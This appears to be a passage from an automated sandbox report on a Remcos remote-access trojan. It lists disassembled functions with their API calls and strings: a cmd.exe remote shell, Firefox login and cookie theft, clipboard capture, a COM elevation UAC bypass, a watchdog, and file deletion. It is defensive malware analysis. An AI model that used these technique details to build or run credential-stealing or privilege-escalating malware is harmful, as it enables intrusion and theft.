                                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\winhlp32.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                    • API String ID: 2830904901-3471202801
                                    • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                    • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • SetEvent.KERNEL32(?), ref: 00404E43
                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                                    • closesocket.WS2_32(?), ref: 00404E5A
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                                    • SetEvent.KERNEL32(?), ref: 00404EA2
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                                    • SetEvent.KERNEL32(?), ref: 00404EBA
                                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                                    • SetEvent.KERNEL32(?), ref: 00404ED1
                                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                                    • String ID: PkGNG
                                    • API String ID: 2403171778-263838557
                                    • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                    • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    control_flow_graph 473 448566-44857a 474 448587-4485a2 LoadLibraryExW 473->474 475 44857c-448585 473->475 476 4485a4-4485ad GetLastError 474->476 477 4485cb-4485d1 474->477 478 4485de-4485e0 475->478 479 4485bc 476->479 480 4485af-4485ba LoadLibraryExW 476->480 481 4485d3-4485d4 FreeLibrary 477->481 482 4485da 477->482 483 4485be-4485c0 479->483 480->483 481->482 484 4485dc-4485dd 482->484 483->477 485 4485c2-4485c9 483->485 484->478 485->484
                                    APIs
                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                    • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad$ErrorLast
                                    • String ID:
                                    • API String ID: 3177248105-0
                                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: AddressProc__crt_fast_encode_pointer
                                    • String ID:
                                    • API String ID: 2279764990-0
                                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                    • _free.LIBCMT ref: 00450140
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                    • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                    • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                    • API String ID: 3018269243-13974260
                                    • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                    • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                    • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32 ref: 004168C2
                                    • EmptyClipboard.USER32 ref: 004168D0
                                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                    • String ID: !D@
                                    • API String ID: 3520204547-604454484
                                    • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                    • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _wcslen.LIBCMT ref: 00407521
                                    • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Object_wcslen
                                    • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    • API String ID: 240030777-3166923314
                                    • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                    • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                    • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                    • GetLastError.KERNEL32 ref: 0041A7BB
                                    • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                    • String ID:
                                    • API String ID: 3587775597-0
                                    • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                    • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                    • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                    • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: lJD$lJD$lJD
                                    • API String ID: 745075371-479184356
                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                    • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                    • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                    • Opcode Fuzzy Hash: 82314eeff241e38e25ba769843facc622900e81eecec2918aec2115619fdd9a6
                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                     Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                    • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                     Uniqueness Score: -1.00%

                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                    Memory Dump Source
